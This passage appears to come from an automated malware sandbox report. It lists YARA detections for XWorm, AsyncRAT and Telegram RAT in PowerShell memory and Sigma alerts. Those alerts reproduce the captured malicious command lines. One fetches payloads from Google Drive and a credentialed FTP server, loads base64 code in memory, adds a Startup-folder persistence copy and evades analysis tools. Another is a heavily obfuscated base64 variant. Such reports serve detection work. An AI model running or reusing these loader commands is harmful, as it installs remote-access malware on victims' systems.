Process Memory Space: powershell.exe PID: 8700	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x29e5d:$b2: ::FromBase64String( 0x326a2:$b2: ::FromBase64String( 0xcc7e0:$b2: ::FromBase64String( 0xcc949:$b2: ::FromBase64String( 0xcfb45:$b2: ::FromBase64String( 0xb9d9d:$s1: -join 0xc1076:$s1: -join 0x11471:$s3: reverse 0x1175f:$s3: reverse 0x11e79:$s3: reverse 0x12632:$s3: reverse 0x19570:$s3: reverse 0x1998a:$s3: reverse 0x1a512:$s3: reverse 0x1b1bf:$s3: reverse 0x50f9b:$s3: reverse 0x5afd1:$s3: reverse 0x86c43:$s3: reverse 0x9237c:$s3: reverse 0x12f304:$s3: reverse 0x135f86:$s3: reverse
Process Memory Space: powershell.exe PID: 8224	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 8224	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: powershell.exe PID: 8224	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x7a711:$b2: ::FromBase64String( 0x7a87b:$b2: ::FromBase64String( 0x9dbc2:$b2: ::FromBase64String( 0xa6407:$b2: ::FromBase64String( 0x5113c:$s1: -join 0x58064:$s1: -join 0x4d2bc:$s4: += 0x4d2db:$s4: += 0x4d316:$s4: += 0x4d333:$s4: += 0x4d36e:$s4: += 0x4d3da:$s4: += 0x4d466:$s4: += 0x4d574:$s4: += 0x4f2a9:$s4: += 0x4f2cc:$s4: += 0x5a38a:$s4: += 0x5e904:$s4: += 0x5e983:$s4: += 0x5eb9e:$s4: += 0x5ec21:$s4: +=
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
53.2.powershell.exe.1d3333e0230.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
53.2.powershell.exe.1d3333e0230.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6cda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66ba:$cnc4: POST / HTTP/1.1
44.2.powershell.exe.1558669f3b8.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
44.2.powershell.exe.1558669f3b8.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6cda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66ba:$cnc4: POST / HTTP/1.1
32.2.RegAsm.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
32.2.RegAsm.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
32.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ada:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84ba:$cnc4: POST / HTTP/1.1
36.2.powershell.exe.1de3d91f608.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
36.2.powershell.exe.1de3d91f608.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6cda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66ba:$cnc4: POST / HTTP/1.1
28.2.powershell.exe.1e6806fed08.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
28.2.powershell.exe.1e6806fed08.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6cda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66ba:$cnc4: POST / HTTP/1.1
20.2.powershell.exe.20ece618be0.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
20.2.powershell.exe.20ece618be0.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6cda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66ba:$cnc4: POST / HTTP/1.1
44.2.powershell.exe.1558669b658.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
44.2.powershell.exe.1558669b658.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
44.2.powershell.exe.1558669b658.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc688:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc725:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc83a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc21a:$cnc4: POST / HTTP/1.1
44.2.powershell.exe.1558669f3b8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
44.2.powershell.exe.1558669f3b8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
44.2.powershell.exe.1558669f3b8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ada:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84ba:$cnc4: POST / HTTP/1.1
4.2.powershell.exe.177d903f890.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
28.2.powershell.exe.1e6806fed08.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
28.2.powershell.exe.1e6806fed08.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
28.2.powershell.exe.1e6806fed08.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ada:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84ba:$cnc4: POST / HTTP/1.1
4.2.powershell.exe.177da235a08.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
28.2.powershell.exe.1e6806fafa8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
28.2.powershell.exe.1e6806fafa8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
28.2.powershell.exe.1e6806fafa8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc688:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc725:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc83a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc21a:$cnc4: POST / HTTP/1.1
20.2.powershell.exe.20ece618be0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
20.2.powershell.exe.20ece618be0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.powershell.exe.20ece618be0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ada:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84ba:$cnc4: POST / HTTP/1.1
20.2.powershell.exe.20ece614e80.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
20.2.powershell.exe.20ece614e80.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.powershell.exe.20ece614e80.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc688:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc725:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc83a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc21a:$cnc4: POST / HTTP/1.1
36.2.powershell.exe.1de3d91b8a8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
36.2.powershell.exe.1de3d91b8a8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
36.2.powershell.exe.1de3d91b8a8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc688:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc725:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc83a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc21a:$cnc4: POST / HTTP/1.1
53.2.powershell.exe.1d3333e0230.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
53.2.powershell.exe.1d3333e0230.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
53.2.powershell.exe.1d3333e0230.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ada:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84ba:$cnc4: POST / HTTP/1.1
36.2.powershell.exe.1de3d91f608.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
36.2.powershell.exe.1de3d91f608.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
36.2.powershell.exe.1de3d91f608.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ada:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84ba:$cnc4: POST / HTTP/1.1
53.2.powershell.exe.1d3333dc4d0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
53.2.powershell.exe.1d3333dc4d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
53.2.powershell.exe.1d3333dc4d0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc688:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc725:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc83a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc21a:$cnc4: POST / HTTP/1.1
Click to see the 40 entries

Other

Source	Rule	Description	Author	Strings
amsi64_5764.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Networking

Sigma detected: Paste sharing url in reverse order

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

